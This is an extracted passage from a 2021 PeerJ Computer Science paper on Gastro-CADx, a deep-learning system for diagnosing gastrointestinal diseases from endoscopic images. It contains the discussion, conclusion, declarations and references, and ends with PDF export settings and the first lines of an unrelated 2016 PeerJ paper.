features. It also used DCT and DWT not only for feature extractors but also for feature reduction methods. Moreover, it fuzes these several reduced t features to enhance the performance of the CADx. The three stages of Gatro-CADx based on deep CNNs, DCT, and DWT showed the best performance with the highest accuracies of 97.3% and 99.7% for Dataset I and Dataset II respectively. The following article (Attallah, 2020; Colquhoun, 2014), that that the reliability of a medical system requires that the sensitivity should be greater than or equivalent to 80%, the specificity is greater or equivalent to 95%, and the precision is more or equivalent to 95%. The specificities, sensitivities, and precision shown in Table 9 are all larger than 95%, therefore Gastro-CADx can be considered a reliable system. This remarkable reliability and performance of Gastro-CADx rises its usability in the diagnosis of several GI diseases by automatically detecting several types of GI lesions or anomalies. Our AI-based Gastro-CADx framework can help the medical experts in an effective diagnosis of several complex GI diseases. Furthermore, it may assist gastroenterologists in reaching a more accurate diagnosis whereas reducing examination time. The proposed system can be used to decrease medical obstacles, death-rates in addition to the cost of treatment. CONCLUSION This article introduced a CADx system called Gastro-CADx for the automatic classification of GI diseases based on DL techniques. Gastro-CADx consist of three stages. The first stage is based on DL feature extraction techniques to extract spatial information from endoscopic images. The second stage extracted some temporal-frequency and spatial-frequency features. The feature reduction procedure is also considered in this stage. Table 13 Comparisons with studies based on Dataset II. Method Accuracy (%) AlexNet 91.66 ResNet-50 (Borgli et al., 2020) 94.75 DarkNet-19 93.26 DenseNet-201 91.93 Gastro-CADx 99.7 Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 29/36 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ The third stage is a feature fusion based process where several features sets extracted in the second stage are fuzed to form numerous combinations of fuzed features. The results of the three stages of Gastro-CADx verified that the proposed system was capable of accurately classifying GI diseases. The first stage of Gastro-CADx achieved higher accuracy than that of end to end DL CNNs. Moreover, the results of the second stage of Gastro-CADx indicated that using the temporal-frequency and spatial-frequency has a better performance compared to using only spatial features. Besides, the second stage of Gastro-CADx achieved competitive performance to the first stage with a lower dimension of features. Also, the third stage has further improvement in the performance of Gastro-CADx which indicated that feature fusion had a significant impact on the accuracy of classification. The performance of the Gastro-CADx is competitive with recent related work based on the same dataset. This means the proposed method can be used efficiently for the diagnosis and classification of GI diseases. Consequently, the cost of medical investigations, medical complications, and death-rates will be reduced. Moreover, the quality of diagnosis will be enhanced as well as the accuracy. Future work will focus on combining multiple datasets to form a multicenter study. Besides, exploring more CNNs and more handcrafted feature extraction methods. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Omneya Attallah conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Maha Sharkas performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The Kvasir dataset (kvasir-datasetV1) is available at Pogorelov et al. (2017) and Simula: https://datasets.simula.no/kvasir/. The HyperKavasir dataset (labeled images) is also available at Borgli et al. (2019) (DOI 10.31219/osf.io/mkzcq) and Simula: https://datasets.simula.no/hyper-kvasir/. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.423#supplemental-information. Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 30/36 https://datasets.simula.no/kvasir/ http://dx.doi.org/10.31219/osf.io/mkzcq https://datasets.simula.no/hyper-kvasir/ http://dx.doi.org/10.7717/peerj-cs.423#supplemental-information http://dx.doi.org/10.7717/peerj-cs.423#supplemental-information http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ REFERENCES Agrawal T, Gupta R, Sahu S, Espy-Wilson CY. 2017. SCL-UMD at the medico task-mediaeval 2017: transfer learning based classification of medical images. In: MediaEval. Ahmad J, Muhammad K, Lee MY, Baik SW. 2017. Endoscopic image classification and retrieval using clustered convolutional features. Journal of Medical Systems 41(12):196 DOI 10.1007/s10916-017-0836-y. Alaskar H, Hussain A, Al-Aseem N, Liatsis P, Al-Jumeily D. 2019. Application of convolutional neural networks for automated ulcer detection in wireless capsule endoscopy images. Sensors 19(6):1265 DOI 10.3390/s19061265. Ali H, Sharif M, Yasmin M, Rehmani MH, Riaz F. 2019. A survey of feature extraction and fusion of deep learning for detection of abnormalities in video endoscopy of gastrointestinal-tract. Artificial Intelligence Review 53(4):1–73 DOI 10.1007/s10462-019-09743-2. Anthimopoulos M, Christodoulidis S, Christe A, Mougiakakou S. 2014. Classification of interstitial lung disease patterns using local DCT features and random forest. In: 2014 36th Annual International Conference of the IEEE Engineering in Medicine and Biology Society. Piscataway: IEEE, 6040–6043. Aoki T, Yamada A, Aoyama K, Saito H, Tsuboi A, Nakada A, Niikura R, Fujishiro M, Oka S, Ishihara S. 2019. Automatic detection of erosions and ulcerations in wireless capsule endoscopy images based on a deep convolutional neural network. Gastrointestinal Endoscopy 89(2):357–363 DOI 10.1016/j.gie.2018.10.027. Anwar F, Attallah O, Ghanem N, Ismail MA. 2020. Automatic breast cancer classification from histopathological images. In: 2019 International Conference on Advances in the Emerging Computing Technologies (AECT). Piscataway: IEEE, 1–6. Attallah O. 2020. An effective mental stress state detection and evaluation system using minimum number of frontal brain electrodes. Diagnostics 10(5):292–327 DOI 10.3390/diagnostics10050292. Attallah O. 2021. MB-AI-His: histopathological diagnosis of pediatric medulloblastoma and its subtypes via AI. Diagnostics 11:359. Attallah O, Karthikesalingam A, Holt PJ, Thompson MM, Sayers R, Bown MJ, Choke EC, Ma X. 2017a. Feature selection through validation and un-censoring of endovascular repair survival data for predicting the risk of re-intervention. BMC Medical Informatics and Decision Making 17(1):115–133 DOI 10.1186/s12911-017-0508-3. Attallah O, Karthikesalingam A, Holt PJ, Thompson MM, Sayers R, Bown MJ, Choke EC, Ma X. 2017b. Using multiple classifiers for predicting the risk of endovascular aortic aneurysm repair re-intervention through hybrid feature selection. Proceedings of the Institution of Mechanical Engineers, Part H: Journal of Engineering in Medicine 231(11):1048–1063 DOI 10.1177/0954411917731592. Attallah O, Ragab DA, Sharkas M. 2020. MULTI-DEEP: a novel CAD system for coronavirus (COVID-19) diagnosis from CT images using multiple convolution neural networks. PeerJ 8(2):e10086 DOI 10.7717/peerj.10086. Attallah O, Sharkas MA, Gadelkarim H. 2019. Fetal brain abnormality classification from mri images of different gestational age. Brain Sciences 9(9):231–252 DOI 10.3390/brainsci9090231. Attallah O, Sharkas MA, Gadelkarim H. 2020. Deep learning techniques for automatic detection of embryonic neurodevelopmental disorders. Diagnostics 10(1):27–49 DOI 10.3390/diagnostics10010027. Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 31/36 http://dx.doi.org/10.1007/s10916-017-0836-y http://dx.doi.org/10.3390/s19061265 http://dx.doi.org/10.1007/s10462-019-09743-2 http://dx.doi.org/10.1016/j.gie.2018.10.027 http://dx.doi.org/10.3390/diagnostics10050292 http://dx.doi.org/10.1186/s12911-017-0508-3 http://dx.doi.org/10.1177/0954411917731592 http://dx.doi.org/10.7717/peerj.10086 http://dx.doi.org/10.3390/brainsci9090231 http://dx.doi.org/10.3390/diagnostics10010027 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Aydoğdu Ö, Ekinci M. 2020. An approach for streaming data feature extraction based on discrete cosine transform and particle swarm optimization. Symmetry 12(2):299 DOI 10.3390/sym12020299. Benhassine NE, Boukaache A, Boudjehem D. 2020. Medical image classification using the discriminant power analysis (DPA) of discrete cosine transform (DCT) coefficients. In: Real Perspective of Fourier Transforms. IntechOpen. Bennet J, Arul Ganaprakasam C, Arputharaj K. 2014. A discrete wavelet based feature extraction and hybrid classification technique for microarray data analysis. Scientific World Journal 2014:1–9 DOI 10.1155/2014/195470. Bi Z, Yu L, Gao H, Zhou P, Yao H. 2020. Improved VGG model-based efficient traffic sign recognition for safe driving in 5G scenarios. Epub ahead of print 19 August 2020. International Journal of Machine Learning and Cybernetics DOI 10.1007/s13042-020-01185-5. Billah M, Waheed S, Rahman MM. 2017. An automatic gastrointestinal polyp detection system in video endoscopy using fusion of color wavelet and convolutional neural network features. International Journal of Biomedical Imaging 2017(1):1–9 DOI 10.1155/2017/9545920. Borgli H, Thambawita V, Smedsrud PH, Hicks S, Jha D, Eskeland SL, Randel KR, Pogorelov K, Lux M, Nguyen DTD. 2020. HyperKvasir, a comprehensive multi-class image and video dataset for gastrointestinal endoscopy. Scientific Data 7(1):1–14 DOI 10.1038/s41597-020-00622-y. Castellano G, Bonilha L, Li LM, Cendes F. 2004. Texture analysis of medical images. Clinical Radiology 59:1061–1069 DOI 10.1016/j.crad.2004.07.008. Colquhoun D. 2014. An investigation of the false discovery rate and the misinterpretation of p-values. Royal Society Open Science 1(3):140216 DOI 10.1098/rsos.140216. Dabbaghchian S, Ghaemmaghami MP, Aghagolzadeh A. 2010. Feature extraction using discrete cosine transform and discrimination power analysis with a face recognition technology. Pattern Recognition 43(4):1431–1440 DOI 10.1016/j.patcog.2009.11.001. Das D, Mahanta LB, Baishya BK, Ahmed S. 2020. Classification of childhood medulloblastoma and its subtypes using transfer learning features: a comparative study of deep convolutional neural networks. In: 2020 International Conference on Computer, Electrical & Communication Engineering (ICCECE). Piscataway: IEEE, 1–5. Deeba F, Islam M, Bui FM, Wahid KA. 2018. Performance assessment of a bleeding detection algorithm for endoscopic video based on classifier fusion method and exhaustive feature selection. Biomedical Signal Processing and Control 40(3):415–424 DOI 10.1016/j.bspc.2017.10.011. Du W, Rao N, Liu D, Jiang H, Luo C, Li Z, Gan T, Zeng B. 2019. Review on the applications of deep learning in the analysis of gastrointestinal endoscopy images. IEEE Access 7:142053–142069 DOI 10.1109/ACCESS.2019.2944676. Ertosun MG, Rubin DL. 2015. Probabilistic visual search for masses within mammography images using deep learning. In: 2015 IEEE International Conference on Bioinformatics and Biomedicine (BIBM). Piscataway: IEEE, 1310–1315. Fan S, Xu L, Fan Y, Wei K, Li L. 2018. Computer-aided detection of small intestinal ulcer and erosion in wireless capsule endoscopy images. Physics in Medicine & Biology 63(16):165001 DOI 10.1088/1361-6560/aad51c. Ghatwary N, Ye X, Zolgharni M. 2019. Esophageal abnormality detection using densenet based faster r-cnn with gabor features. IEEE Access 7:84374–84385 DOI 10.1109/ACCESS.2019.2925585. Ghatwary N, Zolgharni M, Ye X. 2019. Early esophageal adenocarcinoma detection using deep learning methods. International Journal of Computer Assisted Radiology and Surgery 14(4):611–621 DOI 10.1007/s11548-019-01914-4. Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 32/36 http://dx.doi.org/10.3390/sym12020299 http://dx.doi.org/10.1155/2014/195470 http://dx.doi.org/10.1007/s13042-020-01185-5 http://dx.doi.org/10.1155/2017/9545920 http://dx.doi.org/10.1038/s41597-020-00622-y http://dx.doi.org/10.1016/j.crad.2004.07.008 http://dx.doi.org/10.1098/rsos.140216 http://dx.doi.org/10.1016/j.patcog.2009.11.001 http://dx.doi.org/10.1016/j.bspc.2017.10.011 http://dx.doi.org/10.1109/ACCESS.2019.2944676 http://dx.doi.org/10.1088/1361-6560/aad51c http://dx.doi.org/10.1109/ACCESS.2019.2925585 http://dx.doi.org/10.1007/s11548-019-01914-4 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Ghosh T, Fattah SA, Wahid KA. 2018. CHOBS: color histogram of block statistics for automatic bleeding detection in wireless capsule endoscopy video. IEEE Journal of Translational Engineering in Health and Medicine 6:1–12 DOI 10.1109/JTEHM.2017.2756034. Hamashima C, Shabana M, Okada K, Okamoto M, Osaki Y. 2015. Mortality reduction from gastric cancer by endoscopic and radiographic screening. Cancer science 106(12):1744–1749 DOI 10.1111/cas.12829. He J-Y, Wu X, Jiang Y-G, Peng Q, Jain R. 2018. Hookworm detection in wireless capsule endoscopy images with deep learning. IEEE Transactions on Image Processing 27(5):2379–2392 DOI 10.1109/TIP.2018.2801119. He K, Zhang X, Ren S, Sun J. 2016. Deep residual learning for image recognition. IEEE Conference on Computer Vision and Pattern Recognition 770–778 DOI 10.1109/CVPR.2016.90. Huang G, Liu Z, Van Der Maaten L, Weinberger KQ. 2017. Densely connected convolutional networks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 4700–4708. Igarashi S, Sasaki Y, Mikami T, Sakuraba H, Fukuda S. 2020. Anatomical classification of upper gastrointestinal organs under various image capture conditions using AlexNet. Computers in Biology and Medicine 124(6):103950 DOI 10.1016/j.compbiomed.2020.103950. Imtiaz H, Fattah SA. 2010. A DCT-based feature extraction algorithm for palm-print recognition. In: 2010 International Conference on Communication Control and Computing Technologies. Piscataway: IEEE, 657–660. Jin S, Wang B, Xu H, Luo C, Wei L, Zhao W, Hou X, Ma W, Xu Z, Zheng Z. 2020. AI-assisted CT imaging analysis for COVID-19 screening: building and deploying a medical AI system in four weeks. MedRxiv DOI 10.1101/2020.03.19.20039354. Kainuma M, Furusyo N, Urita Y, Nagata M, Ihara T, Oji T, Nakaguchi T, Namiki T, Hayashi J. 2015. The association between objective tongue color and endoscopic findings: results from the Kyushu and Okinawa population study (KOPS). BMC Complementary and Alternative Medicine 15(1):372 DOI 10.1186/s12906-015-0904-0. Karargyris A, Bourbakis N. 2011. Detection of small bowel polyps and ulcers in wireless capsule endoscopy videos. IEEE Transactions on Biomedical Engineering 58(10):2777–2786 DOI 10.1109/TBME.2011.2155064. Khan MA, Kadry S, Alhaisoni M, Nam Y, Zhang Y, Rajinikanth V, Sarfraz MS. 2020a. Computer-aided gastrointestinal diseases analysis from wireless capsule endoscopy: a framework of best features selection. IEEE Access 8:132850–132859 DOI 10.1109/ACCESS.2020.3010448. Khan MA, Khan MA, Ahmed F, Mittal M, Goyal LM, Hemanth DJ, Satapathy SC. 2020b. Gastrointestinal diseases segmentation and classification based on duo-deep architectures. Pattern Recognition Letters 131:193–204 DOI 10.1016/j.patrec.2019.12.024. Khan MA, Rashid M, Sharif M, Javed K, Akram T. 2019. Classification of gastrointestinal diseases of stomach from WCE using improved saliency-based method and discriminant features selection. Multimedia Tools and Applications 78(19):27743–27770 DOI 10.1007/s11042-019-07875-9. Kim D, Cho H, Cho H. 2019. Gastric lesion classification using deep learning based on fast and robust fuzzy C-means and simple linear iterative clustering superpixel algorithms. Journal of Electrical Engineering & Technology 14(6):2549–2556 DOI 10.1007/s42835-019-00259-x. Krizhevsky A, Sutskever I, Hinton GE. 2012. Imagenet classification with deep convolutional neural networks. In: Advances in Neural Information Processing Systems, 1097–1105. Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 33/36 http://dx.doi.org/10.1109/JTEHM.2017.2756034 http://dx.doi.org/10.1111/cas.12829 http://dx.doi.org/10.1109/TIP.2018.2801119 http://dx.doi.org/10.1109/CVPR.2016.90 http://dx.doi.org/10.1016/j.compbiomed.2020.103950 http://dx.doi.org/10.1101/2020.03.19.20039354 http://dx.doi.org/10.1186/s12906-015-0904-0 http://dx.doi.org/10.1109/TBME.2011.2155064 http://dx.doi.org/10.1109/ACCESS.2020.3010448 http://dx.doi.org/10.1016/j.patrec.2019.12.024 http://dx.doi.org/10.1007/s11042-019-07875-9 http://dx.doi.org/10.1007/s42835-019-00259-x http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Lahmiri S, Boukadoum M. 2013. Hybrid discrete wavelet transform and gabor filter banks processing for features extraction from biomedical images. Journal of Medical Engineering 2013(7):1–13 DOI 10.1155/2013/104684. Lee JH, Kim YJ, Kim YW, Park S, Choi Y, Kim YJ, Park DK, Kim KG, Chung J-W. 2019. Spotting malignancies from gastric endoscopic images using deep learning. Surgical Endoscopy 33(11):3790–3797 DOI 10.1007/s00464-019-06677-2. Leng J, Li T, Bai G, Dong Q, Dong H. 2016. Cube-CNN-SVM: a novel hyperspectral image classification method. In: 2016 IEEE 28th International Conference on Tools with Artificial Intelligence (ICTAI). Piscataway: IEEE, 1027–1034. Li B, Meng MQ-H. 2012a. Automatic polyp detection for wireless capsule endoscopy images. Expert Systems with Applications 39(12):10952–10958 DOI 10.1016/j.eswa.2012.03.029. Li B, Meng MQ-H. 2012b. Tumor recognition in wireless capsule endoscopy images using textural features and SVM-based feature selection. IEEE Transactions on Information Technology in Biomedicine 16(3):323–329 DOI 10.1109/TITB.2012.2185807. Majid A, Khan MA, Yasmin M, Rehman A, Yousafzai A, Tariq U. 2020. Classification of stomach infections: a paradigm of convolutional neural network along with classical features fusion and selection. Microscopy Research and Technique 83(5):562–576 DOI 10.1002/jemt.23447. Mishra S, Sharma L, Majhi B, Sa PK. 2017. Microscopic image classification using dct for the detection of acute lymphoblastic leukemia (all). In: Proceedings of International Conference on Computer Vision and Image Processing. Singapore: Springer, 171–180. Nguyen DT, Lee MB, Pham TD, Batchuluun G, Arsalan M, Park KR. 2020. Enhanced image-based endoscopic pathological site classification using an ensemble of deep learning models. Sensors 20:5982. Jadoon MM, Zhang Q, Haq IU, Butt S, Jadoon A. 2017. Three-class mammogram classification based on descriptive CNN features. Hindawi BioMed Research International 17:11 DOI 10.1155/2017/3640901. Nadeem S, Tahir MA, Naqvi SSA, Zaid M. 2018. Ensemble of texture and deep learning features for finding abnormalities in the gastro-intestinal tract. In: International Conference on Computational Collective Intelligence, Springer, 469–478. Owais M, Arsalan M, Choi J, Mahmood T, Park KR. 2019. Artificial intelligence-based classification of multiple gastrointestinal diseases using endoscopy videos for clinical diagnosis. Journal of Clinical Medicine 8(7):986 DOI 10.3390/jcm8070986. Owais M, Arsalan M, Mahmood T, Kang JK, Park KR. 2020. Automated diagnosis of various gastrointestinal lesions using a deep learning–based classification and retrieval framework with a large endoscopic database: model development and validation. Journal of Medical Internet Research 22:e18563. Pei M, Wu X, Guo Y, Fujita H. 2017. Small bowel motility assessment based on fully convolutional networks and long short-term memory. Knowledge-Based Systems 121(5):163–172 DOI 10.1016/j.knosys.2017.01.023. Pogorelov K, Randel KR, Griwodz C, Eskeland SL, de Lange T, Johansen D, Spampinato C, Dang-Nguyen D-T, Lux M, Schmidt PT. 2017. Kvasir: a multi-class image dataset for computer aided gastrointestinal disease detection. In: Proceedings of the 8th ACM on Multimedia Systems Conference. New York: ACM, 164–169. Ragab DA, Attallah O. 2020. FUSI-CAD: coronavirus (COVID-19) diagnosis based on the fusion of CNNs and handcrafted features. PeerJ Computer Science 6(2):e306 DOI 10.7717/peerj-cs.306. Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 34/36 http://dx.doi.org/10.1155/2013/104684 http://dx.doi.org/10.1007/s00464-019-06677-2 http://dx.doi.org/10.1016/j.eswa.2012.03.029 http://dx.doi.org/10.1109/TITB.2012.2185807 http://dx.doi.org/10.1002/jemt.23447 http://dx.doi.org/10.1155/2017/3640901 http://dx.doi.org/10.3390/jcm8070986 http://dx.doi.org/10.1016/j.knosys.2017.01.023 http://dx.doi.org/10.7717/peerj-cs.306 http://dx.doi.org/10.7717/peerj-cs.423 https://peerj.com/computer-science/ Ragab DA, Sharkas M, Attallah O. 2019. Breast cancer diagnosis using an efficient CAD system based on multiple classifiers. Diagnostics 9(4):165–191 DOI 10.3390/diagnostics9040165. Ragab DA, Sharkas M, Marshall S, Ren J. 2019. Breast cancer detection using deep convolutional neural networks and support vector machines. PeerJ 7(5):e6201 DOI 10.7717/peerj.6201. Rashidi S, Fallah A, Towhidkhah F. 2012. Feature extraction based DCT on dynamic signature verification. Scientia Iranica 19(6):1810–1819 DOI 10.1016/j.scient.2012.05.007. Ravì D, Wong C, Deligianni F, Berthelot M, Andreu-Perez J, Lo B, Yang G-Z. 2016. Deep learning for health informatics. IEEE Journal of Biomedical and Health Informatics 21:4–21. Redmon J, Farhadi A. 2017. YOLO9000: better, faster, stronger. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 7263–7271. Sampaio WB, Diniz EM, Silva AC, De Paiva AC, Gattass M. 2011. Detection of masses in mammogram images using CNN, geostatistic functions and SVM. Computers in Biology and Medicine 41(8):653–664 DOI 10.1016/j.compbiomed.2011.05.017. Sharif M, Attique Khan M, Rashid M, Yasmin M, Afza F, Tanik UJ. 2019. Deep CNN and geometric features-based gastrointestinal tract diseases detection and classification from wireless capsule endoscopy images. Journal of Experimental & Theoretical Artificial Intelligence 1–23. Shi Q, Li W, Zhang F, Hu W, Sun X, Gao L. 2018. Deep CNN with multi-scale rotation invariance features for ship classification. IEEE Access 6:38656–38668 DOI 10.1109/ACCESS.2018.2853620. Srivastava V, Purwar RK. 2017. A five-level wavelet decomposition and dimensional reduction approach for feature extraction and classification of MR and CT scan images. Applied Computational Intelligence and Soft Computing 2017(3):1–9 DOI 10.1155/2017/9571262. Su D, Li Y, Zhao Y, Xu R, Yuan B, Wu W. 2020. A face recognition algorithm based on dual-channel images and VGG-cut model. Journal of Physics: Conference Series 1693:012151. Talo M, Baloglu UB, Yıldırım Ö, Acharya UR. 2019. Application of deep transfer learning for automated brain abnormality classification using MR images. Cognitive Systems Research 54(C):176–188 DOI 10.1016/j.cogsys.2018.12.007. Thai LH, Hai TS, Thuy NT. 2012. Image classification using support vector machine and artificial neural network. International Journal of Information Technology and Computer Science 4(5):32–38 DOI 10.5815/ijitcs.2012.05.05. Thambawita V, Jha D, Riegler M, Halvorsen P, Hammer HL, Johansen HD, Johansen D. 2018. The medico-task 2018: Disease detection in the gastrointestinal tract using global features and deep learning. arXiv preprint arXiv: 1810.13278. Wang R, Xu J, Han TX. 2019. Object instance detection with pruned Alexnet and extended training data. Signal Processing: Image Communication 70(4):145–156 DOI 10.1016/j.image.2018.09.013. Wu H, Huang Q, Wang D, Gao L. 2018. A CNN-SVM combined model for pattern recognition of knee motion using mechanomyography signals. Journal of Electromyography and Kinesiology 42(10):136–142 DOI 10.1016/j.jelekin.2018.07.005. Xue D-X, Zhang R, Feng H, Wang Y-L. 2016. CNN-SVM for microvascular morphological type recognition with data augmentation. Journal of Medical and Biological Engineering 36(6):755–764 DOI 10.1007/s40846-016-0182-4. Yuan Y, Li B, Meng MQ-H. 2015. Improved bag of feature for automatic polyp detection in wireless capsule endoscopy images. IEEE Transactions on Automation Science and Engineering 13(2):529–535 DOI 10.1109/TASE.2015.2395429. Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 35/36 http://dx.doi.org/10.3390/diagnostics9040165 http://dx.doi.org/10.7717/peerj.6201 http://dx.doi.org/10.1016/j.scient.2012.05.007 http://dx.doi.org/10.1016/j.compbiomed.2011.05.017 http://dx.doi.org/10.1109/ACCESS.2018.2853620 http://dx.doi.org/10.1155/2017/9571262 http://dx.doi.org/10.1016/j.cogsys.2018.12.007 http://dx.doi.org/10.5815/ijitcs.2012.05.05 http://dx.doi.org/10.1016/j.image.2018.09.013 http://dx.doi.org/10.1016/j.jelekin.2018.07.005 http://dx.doi.org/10.1007/s40846-016-0182-4 http://dx.doi.org/10.1109/TASE.2015.2395429 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.423 Yuan Y, Meng MQ-H. 2014. Polyp classification based on bag of features and saliency in wireless capsule endoscopy. In: 2014 IEEE International Conference on Robotics and Automation (ICRA). Piscataway: IEEE, 3930–3935. Yuan Y, Meng MQ-H. 2017. Deep learning for polyp recognition in wireless capsule endoscopy images. Medical Physics 44(4):1379–1389 DOI 10.1002/mp.12147. Zhang H, Wu R, Yuan T, Jiang Z, Huang S, Wu J, Hua J, Niu Z, Ji D. 2020. DE-Ada*: a novel model for breast mass classification using cross-modal pathological semantic mining and organic integration of multi-feature fusions. Information Sciences 539(1–3):461–486 DOI 10.1016/j.ins.2020.05.080. Attallah and Sharkas (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.423 36/36 http://dx.doi.org/10.1002/mp.12147 http://dx.doi.org/10.1016/j.ins.2020.05.080 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.423 GASTRO-CADx: a three stages framework for diagnosing gastrointestinal diseases Introduction Materials and Methods Experimental setup Evaluation performance Results Discussion Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_4jc6r4nqhfdotlm3egq4retkha ---- Submitted 25 February 2016 Accepted 28 April 2016 Published 23 May 2016 Corresponding author Marco Kuhrmann, kuhrmann@mmmi.sdu.dk Academic editor Marlon Dumas Additional Information and Declarations can be found on page 34 DOI 10.7717/peerj-cs.62 Copyright 2016 Kuhrmann et al. Distributed under Creative Commons CC-BY 